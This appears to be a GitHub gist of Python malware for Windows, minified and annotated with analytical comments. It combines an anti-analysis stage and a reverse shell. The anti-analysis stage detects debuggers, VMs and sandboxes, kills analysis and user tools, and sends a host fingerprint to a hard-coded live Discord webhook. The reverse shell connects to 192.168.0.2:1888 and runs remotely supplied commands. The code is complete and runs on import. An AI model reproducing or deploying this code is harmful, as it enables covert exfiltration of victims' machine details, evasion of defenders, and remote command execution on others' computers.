@CookiesKush
Last active September 15, 2022 17:19
# Single-letter aliases left by a minifier/obfuscator. Every other block in
# the file refers to these names, so they are documented here, not renamed.
q='root'    # command prefix the reverse shell (class f) treats as "run through the shell"
p='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'  # spoofed browser User-Agent sent on webhook POSTs
o='User-Agent'
n='\n'
m='%012x'   # uuid.getnode() rendered as 12 hex digits (MAC address)
l='..'      # regex used to cut that hex string into octet pairs
k=':'       # joiner for the octet pairs -> 'xx:xx:xx:xx:xx:xx'
j='None'    # value stored when the public-IP lookup fails: the *string* 'None', not None
i='https://api.ipify.org'  # public-IP lookup; queried twice (class e and class f)
h=getattr
g=len
T=''
S=Exception
O='ascii'   # C2 traffic is decoded as ASCII; a non-ASCII byte raises and forces a reconnect
N=False
I='content' # Discord webhook payload key
F=str
E=True
import os as A,re,sys as H,wmi,uuid as P,ctypes as B,psutil as J,win32api as K,win32process as L,random
from subprocess import PIPE as M,Popen,check_output as U
from socket import socket as V,AF_INET as W,SOCK_STREAM as X
from signal import signal as Q,SIGINT as Y,SIGTERM as Z
from requests import get as D,post as G
from datetime import datetime as a
from threading import Thread as R
from typing import Tuple
from time import sleep as C
# Hard-coded endpoints.
# `b` is a Discord webhook URL. A webhook URL is a bearer credential — anyone
# holding it can post to (or delete) the webhook — so publishing it in a gist
# leaks it. Every detection message and the host fingerprint from
# e.vtdetect() are POSTed to it.
b='https://discord.com/api/webhooks/1000507254820307015/bBHRwxLMs10xseUyhXKlFtqHKb4bFpOwgb9VKLvfxS4JVlfoTeieKRAejFP8RQLDhk7H'
# Reverse-shell C2 address used by class f. An RFC 1918 address, so as written
# the sample only reaches a listener on the author's LAN; the port is a string
# literal wrapped in int().
c='192.168.0.2'
d=int('1888')
class e:
    """Anti-analysis gate executed before the reverse shell in class f.

    Every check reports to the Discord webhook `b` (kept as ``api``) and then
    terminates with os._exit(1); there is no return value for "detected", and
    the two checks that run on worker threads (anti_debug, block_dlls) kill
    the whole process from the thread. From a defender's point of view the
    observable behaviour is the network traffic: __init__ alone issues eight
    HTTPS GETs (api.ipify.org plus seven raw.githubusercontent.com lists) and
    vtdetect() POSTs a full host fingerprint to the webhook unconditionally.
    """
    def __init__(B) -> None:
        # Webhook target plus four feature switches, all hard-coded True.
        B.api=b;B.vmcheck_switch=E;B.vtdetect_switch=E;B.listcheck_switch=E;B.anti_debug_switch=E
        # Public IP via ipify. On *any* failure the string 'None' is stored,
        # so later `in` tests against list text still run.
        try:B.ip=D(i).text
        except:B.ip=j
        # Host fingerprint and blacklist fetches, all in one statement:
        #  - serveruser / pc_name come from env vars and are None when unset
        #    (listcheck() then raises TypeError on `None in str`).
        #  - mac: uuid.getnode() as 12 hex digits regrouped into 'xx:xx:...'.
        #  - os_name is *bytes* (encode() then split(b'|')), so it renders as
        #    b'...' in the vtdetect() report.
        #  - hwid shells out to `wmic csproduct get uuid` and takes the second
        #    output line. wmic is deprecated and absent on recent Windows
        #    builds — TODO confirm; a missing binary raises here and aborts
        #    construction before any check runs.
        #  - seven GETs with no timeout and no status check: a non-200 body
        #    is silently used as the "list" in listcheck(); platformlist is
        #    fetched but never consulted.
        #  - sandboxDLLs / program_blacklist are substring patterns. The
        #    mixed-case entry 'HTTPDebuggerSvc.exe' can never match the
        #    lowercased process names anti_debug() compares against.
        B.serveruser=A.getenv('UserName');B.pc_name=A.getenv('COMPUTERNAME');B.mac=k.join(re.findall(l,m%P.getnode()));B.computer=wmi.WMI();B.os_info=B.computer.Win32_OperatingSystem()[0];B.os_name=B.os_info.Name.encode('utf-8').split(b'|')[0];B.gpu=B.computer.Win32_VideoController()[0].Name;B.currentplat=B.os_name;B.hwid=U('wmic csproduct get uuid').decode().split(n)[1].strip();B.hwidlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt');B.pcnamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt');B.pcusernamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt');B.iplist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt');B.maclist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt');B.gpulist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt');B.platformlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_platforms.txt');B.sandboxDLLs=['sbiedll.dll','api_log.dll','dir_watch.dll','pstorec.dll','vmcheck.dll','wpespy.dll'];B.program_blacklist=['httpdebuggerui.exe','wireshark.exe','HTTPDebuggerSvc.exe','fiddler.exe','regedit.exe','taskmgr.exe','vboxservice.exe','df5serv.exe','processhacker.exe','vboxtray.exe','vmtoolsd.exe','vmwaretray.exe','ida64.exe','ollydbg.exe','pestudio.exe','vmwareuser','vgauthservice.exe','vmacthlp.exe','x96dbg.exe','vmsrvc.exe','x32dbg.exe','vmusrvc.exe','prl_cc.exe','prl_tools.exe','xenservice.exe','qemu-ga.exe','joeboxcontrol.exe','ksdumperclient.exe','ksdumper.exe','joeboxserver.exe']
    def post_message(A,msg:str) -> None:
        # Form-encoded POST {content: msg} to the webhook with the spoofed
        # Chrome User-Agent. No timeout and no response check.
        G(A.api,headers={o:p},data={I:f"{msg}"})
    def anti_debug(D) -> None:
        # Runs forever on a non-daemon thread (see start()). Every 0.7 s it
        # walks all processes; the first whose lowercased image name contains
        # any program_blacklist entry is reported, killed, and the whole
        # process exits. The list includes ordinary user tools (taskmgr.exe,
        # regedit.exe, wireshark.exe), so on a real host this kills the
        # user's Task Manager. If kill() raises AccessDenied the exit is
        # skipped and the same process is re-reported every 0.7 s.
        while E:
            try:
                C(0.7)
                for B in J.process_iter():
                    if any((A in B.name().lower()for A in D.program_blacklist)):
                        try:D.post_message(f"Anti-Debug Program: {B.name()} was detected running on the system. Closing program...");B.kill();A._exit(1)
                        except (J.NoSuchProcess,J.AccessDenied):pass
            except:pass
    def block_dlls(J) -> None:
        # Companion thread to anti_debug. Once a second it opens every PID
        # with access mask 1040 (0x410 = PROCESS_QUERY_INFORMATION |
        # PROCESS_VM_READ), enumerates its modules and collects lowercased
        # module paths containing any sandboxDLLs name. Processes it cannot
        # open are skipped silently, so only what the current user can read
        # is inspected. Any hit is POSTed as JSON and the process exits.
        while E:
            try:
                C(1);B=[];M=L.EnumProcesses()
                for N in M:
                    try:
                        D=K.OpenProcess(1040,0,N)
                        try:
                            O=L.EnumProcessModules(D)
                            for P in O:
                                H=F(L.GetModuleFileNameEx(D,P)).lower()
                                for Q in J.sandboxDLLs:
                                    if Q in H:
                                        if H not in B:B.append(H)
                        finally:K.CloseHandle(D)
                    except:pass
                if B:G(f"{J.api}",json={I:f"```yaml\n The following sandbox-indicative DLLs were discovered loaded in processes running on the system. Do not proceed.\n Dlls: {B}\n ```"});A._exit(1)
            except:pass
    def ram_check(E) -> None:
        # MEMORYSTATUSEX filled by kernel32.GlobalMemoryStatusEx. Exits when
        # total physical RAM is below 1 GiB — the posted message says
        # "Less than 4 GB", which does not match the `< 1` in the condition.
        # The API's BOOL return is not checked: if the call fails the struct
        # stays zeroed, ullTotalPhys is 0, and the check fires on any host.
        class D(B.Structure):_fields_=[('dwLength',B.c_ulong),('dwMemoryLoad',B.c_ulong),('ullTotalPhys',B.c_ulonglong),('ullAvailPhys',B.c_ulonglong),('ullTotalPageFile',B.c_ulonglong),('ullAvailPageFile',B.c_ulonglong),('ullTotalVirtual',B.c_ulonglong),('ullAvailVirtual',B.c_ulonglong),('sullAvailExtendedVirtual',B.c_ulonglong)]
        C=D();C.dwLength=B.sizeof(D);B.windll.kernel32.GlobalMemoryStatusEx(B.byref(C))
        if C.ullTotalPhys/1073741824<1:G(f"{E.api}",json={I:f"```yaml\n Ram Check: Less than 4 GB of RAM exists on this system. Exiting program...\n ```"});A._exit(1)
    def is_debugger(C) -> None:
        # kernel32.IsDebuggerPresent(): report and exit when non-zero.
        D=B.windll.kernel32.IsDebuggerPresent()
        if D:G(f"{C.api}",json={I:f"```yaml\n IsDebuggerPresent: A debugger is present, exiting program...\n ```"});A._exit(1)
        # CheckRemoteDebuggerPresent is called with False (a NULL pointer) as
        # the pbDebuggerPresent out-parameter, and the BOOL *success* return
        # is what gets compared with 0 — not the out value. With a NULL
        # pointer the call is expected to fail (return 0), so this branch
        # most likely never fires — TODO confirm; had the call succeeded it
        # would fire whether or not a debugger is attached.
        if B.windll.kernel32.CheckRemoteDebuggerPresent(B.windll.kernel32.GetCurrentProcess(),N)!=0:G(f"{C.api}",json={I:f"```yaml\n CheckRemoteDebuggerPresent: A debugger is present, exiting program...\n ```"});A._exit(1)
    def disk_check(D) -> None:
        # Minimum disk size in GB: 50 by default, overridable from argv[1]
        # (float() with no validation, so a non-numeric argument raises
        # ValueError here). GetDiskFreeSpaceEx() with no path reports the
        # current drive and returns (free-for-caller, total, total-free);
        # the *total* size is what is compared against the threshold.
        B=50
        if g(H.argv)>1:B=float(H.argv[1])
        E,F,E=K.GetDiskFreeSpaceEx();C=F/1073741824
        if C<B:G(f"{D.api}",json={I:f"```yaml\n Disk Check: The disk size of this host is {C} GB, which is less than the minimum {B} GB. Exiting program...\n ```"});A._exit(1)
    def vtdetect(A) -> None:
        # Despite the name this detects nothing: it POSTs the host
        # fingerprint (computer name, user name, hwid, public IP, MAC, OS,
        # CPU via WMI Win32_Processor, RAM via psutil, GPU, local time) to
        # the webhook. vtdetect_switch is hard-coded True, so this runs on
        # every start before any VM or blacklist check. PLATFORM is the
        # bytes value built in __init__ and therefore renders as b'...'.
        # The lines below sit inside a triple-quoted string and must stay
        # at column 0.
        G(A.api,headers={o:p},data={I:f"""```yaml
![PC DETECTED]!
PC Name: {A.pc_name}
PC Username: {A.serveruser}
HWID: {A.hwid}
IP: {A.ip}
MAC: {A.mac}
PLATFORM: {A.os_name}
CPU: {A.computer.Win32_Processor()[0].Name}
RAM: {F(round(J.virtual_memory().total/1024.0**3))} GB
GPU: {A.gpu}
TIME: {a.now().strftime("%Y-%m-%d %H:%M:%S")}```"""})
    def vmcheck(B) -> None:
        # Four probes run in order; each posts and exits on a hit, and
        # reaching the end posts "[+] VM Not Detected".
        # C()/D() compare sys.base_prefix (or real_prefix) with sys.prefix.
        # That is the standard "am I inside a virtualenv" test, not a
        # virtualisation test: any venv on physical hardware is reported as
        # "VM DETECTED" here.
        def C():A=None;return h(H,'base_prefix',A)or h(H,'real_prefix',A)or H.prefix
        def D():return C()!=H.prefix
        if D():B.post_message('**VM DETECTED, EXITING PROGRAM...**');A._exit(1)
        def E():
            # Checks that the DriverDesc and ProviderName values exist under
            # the display-adapter device class ({4D36E968-...}\0000).
            # os.system() yields REG's exit status; 1 means "not found".
            # Only existence is tested, never the value contents, so any host
            # with a display driver appears to satisfy both queries — TODO
            # confirm whether this fires on physical machines.
            C=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul');D=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul')
            if C!=1 and D!=1:B.post_message('VMware Registry Detected');A._exit(1)
        def F():
            # Splits TASKLIST output on spaces and keeps tokens containing
            # '.exe', then does a case-sensitive exact compare for the two
            # VMware process names. Also probes System32\vmGuestLib.dll and
            # vboxmrxnp.dll directly under %SystemRoot% (not System32 —
            # whether that is where VirtualBox places it is unverified here).
            H='SystemRoot';E=A.path.join(A.environ[H],'System32\\vmGuestLib.dll');F=A.path.join(A.environ[H],'vboxmrxnp.dll');G=A.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read();C=[]
            for D in G.split(' '):
                if'.exe'in D:C.append(D.replace('K\n',T).replace(n,T))
            if'VMwareService.exe'in C or'VMwareTray.exe'in C:B.post_message('VMwareService.exe & VMwareTray.exe process are running');A._exit(1)
            if A.path.exists(E):B.post_message('**Vmware DLL Detected**');A._exit(1)
            if A.path.exists(F):B.post_message('**VirtualBox DLL Detected**');A._exit(1)
        def G():
            # First three octets of the (lowercase, colon-separated) MAC
            # against four VMware-assigned OUIs. Recomputed rather than
            # reusing self.mac.
            C=k.join(re.findall(l,m%P.getnode()));D=['00:05:69','00:0c:29','00:1c:14','00:50:56']
            if C[:8]in D:B.post_message('**VMware MAC Address Detected**');A._exit(1)
        # The tuple expression just calls the three probes in sequence.
        E(),F(),G();B.post_message('[+] VM Not Detected')
    def listcheck(B) -> None:
        # Substring tests of local values against the raw text of the lists
        # fetched in __init__. Each bare except maps *any* error — the
        # TypeError from `None in str` when USERNAME/COMPUTERNAME are unset,
        # or anything else — to the misleading "Failed to connect to
        # database." message followed by exit. A non-200 fetch is not an
        # error here: its body is simply what the value is searched in.
        D='[ERROR]: Failed to connect to database.'
        try:
            if B.hwid in B.hwidlist.text:B.post_message(f"**Blacklisted HWID Detected. HWID:** `{B.hwid}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
        try:
            if B.serveruser in B.pcusernamelist.text:B.post_message(f"**Blacklisted PC User:** `{B.serveruser}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
        try:
            if B.pc_name in B.pcnamelist.text:B.post_message(f"**Blacklisted PC Name:** `{B.pc_name}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
        try:
            if B.ip in B.iplist.text:B.post_message(f"**Blacklisted IP:** `{B.ip}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
        try:
            if B.mac in B.maclist.text:B.post_message(f"**Blacklisted MAC:** `{B.mac}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
        try:
            if B.gpu in B.gpulist.text:B.post_message(f"**Blacklisted GPU:** `{B.gpu}`");C(2);A._exit(1)
        except:B.post_message(D);C(2);A._exit(1)
    def start(A) -> None:
        # Order: synchronous debugger / disk / RAM checks, then the two
        # scanner threads (non-daemon, so they keep the process alive after
        # the caller returns), then the fingerprint POST, the VM probes and
        # the blacklist checks. All four switches are True from __init__.
        A.is_debugger(),A.disk_check(),A.ram_check()
        if A.anti_debug_switch:R(name='Anti-Debug',target=A.anti_debug).start();R(name='Anti-DLL',target=A.block_dlls).start()
        if A.vtdetect_switch:A.vtdetect()
        if A.vmcheck_switch:A.vmcheck()
        if A.listcheck_switch:A.listcheck()
class f:
    """Minimal TCP reverse shell, constructed at module load right after class e.

    Connects to (c, d) and loops on the connection, running lines that
    contain 'root' through the shell (shell=True) and answering a few
    built-in commands. Everything is plaintext and nothing authenticates
    the remote end: whoever answers on that address gets command execution
    as the current user.
    """
    def __init__(D,connect:Tuple[str,int]=(c,d)) -> None:
        # SIGINT/SIGTERM -> exit_gracefully. Also records the login name,
        # %temp%, an IsUserAnAdmin() flag and the public IP (a second ipify
        # request, duplicating class e). Then an unbounded reconnect loop:
        # any exception out of _connect()/start() — a dropped connection, a
        # non-ASCII command, an oversized reply — sleeps 1 s and dials again;
        # KeyboardInterrupt is swallowed without even the sleep.
        Q(Y,D.exit_gracefully);Q(Z,D.exit_gracefully);D.bot_name=F(A.getlogin()).lower();D.temp=A.getenv('temp');D.is_admin=B.windll.shell32.IsUserAnAdmin()!=0;D.public_ip=D.getip();D.stop=N;D.run=N
        while not D.stop:
            try:D._connect(connect)
            except KeyboardInterrupt:continue
            except:C(1)
    def exit_gracefully(B,signum,frame) -> None:
        # Signal handler: close the socket, wait 1 s, hard-exit. `sock` is
        # first assigned in _connect(), so a signal delivered before the
        # first connection attempt raises AttributeError inside the handler.
        B.stop=E;B.run=N;B.sock.close();C(1);A._exit(1)
    def _connect(A,connect) -> None:
        # Fresh TCP socket per attempt (a previous one is never closed on
        # error); connect, then hand off to the command loop, which only
        # returns by raising.
        A.sock=V(W,X);A.sock.connect(connect);A.start()
    def _recv(B) -> str:
        # One recv() of at most 1024 bytes decoded as ASCII; a non-ASCII
        # byte raises UnicodeDecodeError out of start(). Lines containing
        # 'root' are returned verbatim so shell commands keep their case;
        # everything else is lowercased before dispatch.
        A=B.sock.recv(1024).decode(O)
        if q in A:return A
        else:return A.lower()
    def getip(B) -> str:
        # Public IP via ipify; the string 'None' on any failure.
        try:A=D(i).text
        except:A=j
        return A
    def _shell_run(C,commands:str) -> None:
        # Runs the remote-supplied string through the shell (shell=True, no
        # quoting — that is the point of a reverse shell). Reads stderr to
        # EOF *before* stdout: a command that fills the stdout pipe while
        # stderr is still open blocks forever, and stdin=PIPE is never
        # closed so anything that reads stdin hangs too. sock.send() is not
        # sendall(), so a large output may be delivered only partially.
        B=Popen(commands,shell=E,stdout=M,stderr=M,stdin=M);A=B.stderr.read()+B.stdout.read()
        if g(A)==0:A=b'No Output'
        C.sock.send(A)
    def start(A) -> None:
        # Dispatch loop. `q in B` is a substring test, so any line that
        # contains 'root' anywhere (e.g. 'chroot') is treated as a shell
        # command, and replace('root ', '') strips *every* occurrence, not
        # only a leading prefix. 'kill' closes the socket and then calls
        # exit_gracefully with dummy signal arguments (second close is a
        # no-op). Anything unrecognised is answered with 'Invalid Command'.
        # F.encode('...') is str.encode called on the class: just b'...'.
        # The error templates below are triple-quoted strings and must stay
        # at column 0.
        while E:
            B=A._recv()
            if q in B:
                try:B=B.replace('root ',T);D=F(B);A._shell_run(D)
                except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
            elif'admincheck'in B:
                try:A.sock.send(F.encode('Admin privileges'))if A.is_admin==E else A.sock.send(F.encode('NO Admin privileges'))
                except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
            elif B=='kill':A.sock.send(F.encode('Client Killed'));A.sock.close();A.exit_gracefully(0,0)
            elif B=='getip':
                try:A.sock.send(F.encode(A.public_ip))
                except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
            else:A.sock.send(F.encode('Invalid Command'))
def r() -> None:
    """Connectivity gate: hard-exit the process unless https://google.com answers.

    Defined but never invoked in this file (the module entry runs
    e().start() and then f()). ``except BaseException`` is the same set a
    bare ``except:`` catches, so a KeyboardInterrupt during the request
    also ends the process via os._exit(1).
    """
    try:
        D('https://google.com')
    except BaseException:
        A._exit(1)
e().start();f()